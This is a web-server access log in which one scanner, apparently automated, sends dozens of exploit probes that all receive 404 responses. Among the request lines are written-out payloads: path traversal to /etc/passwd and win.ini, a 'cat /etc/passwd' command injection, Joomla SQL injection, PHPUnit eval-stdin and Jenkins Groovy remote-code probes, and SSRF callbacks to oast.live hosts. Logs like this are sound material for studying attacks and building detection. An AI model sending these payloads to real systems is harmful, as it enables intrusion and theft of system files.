137.220.197.141 - - [21/Jan/2024:04:33:21 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:33:33 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:11 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:22 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:40 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:45 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:49 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:34:59 +0100] "POST /integration/saveGangster.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:02 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:02 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:16 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:24 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:26 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:40 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:35:44 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:17 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:19 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:21 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:23 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:25 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:36:27 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:37:09 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:38:02 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:38:25 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:39:12 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:39:17 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:39:17 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:39:32 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:39:52 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:14 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:16 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:35 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:35 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:44 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:46 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:56 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:40:58 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:41:04 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:41:16 +0100] "GET /dumpmdm.cmd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:41:42 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:41:56 +0100] "GET /__ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:09 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:09 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:11 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:24 +0100] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:24 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:42:47 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:43:01 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:43:03 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:43:35 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsognmwxxrahi73bz.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:02 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:07 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:25 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:41 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:52 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:57 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:44:59 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:06 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:15 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsogrfxeaq7pgboue.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:16 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:20 +0100] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:20 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:27 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsogb18fyp19okgot.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:45:40 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsogee3fxpgfgtaqj.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:05 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:07 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:09 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:11 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:13 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:46:15 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:16 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:18 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:20 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:22 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:24 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:47:26 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:37 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:39 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:41 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:43 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:45 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:48:47 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:49:02 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:49:10 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:49:22 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:49:25 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsog4prs4utjnumkp.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:13 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:15 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:17 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:19 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:21 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsogpgmbk41fd3z68.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:21 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:32 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:50:46 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsog8j5ggj1ofum66.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:51:01 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:51:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:51:10 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:51:14 +0100] "POST /cobbler_api HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:51:23 +0100] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:52:10 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:52:12 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:55:06 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsog8f3ounbwkqedi.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:56:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:56:29 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:56:42 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:56:44 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:57:11 +0100] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:57:13 +0100] "POST /orders/3 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:57:24 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsogoe46bpog1pxmr.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:57:38 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cmm00rc3m87t5g88qsoghjp8kf7f9jiuf.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:58:12 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:58:23 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:58:36 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:59:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:04:59:28 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:00:07 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:00:09 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:00:11 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:00:13 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:00:15 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:01:10 +0100] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:01:12 +0100] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:01:14 +0100] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:01:16 +0100] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:01:18 +0100] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:02:09 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:02:29 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:03:26 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:03:47 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:03:51 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:03:59 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:04:13 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:07:35 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:07:39 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:07:53 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:08:26 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:08:48 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:05:08:58 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:09:13 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:44 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:50 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:52 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:54 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:56 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:58 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:59 +0100] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:10:59 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:13:34 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:13:38 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:13:41 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:14:19 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:14:23 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:15:09 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:15:13 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:03 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:16 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:16 +0100] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:18 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:20 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:22 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:24 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:16:26 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:17:50 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:17:52 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:17:52 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:17:54 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:01 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:41 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:43 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:45 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:47 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:49 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:18:51 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:19:41 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:19:53 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:20:06 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:20:42 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:20:44 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
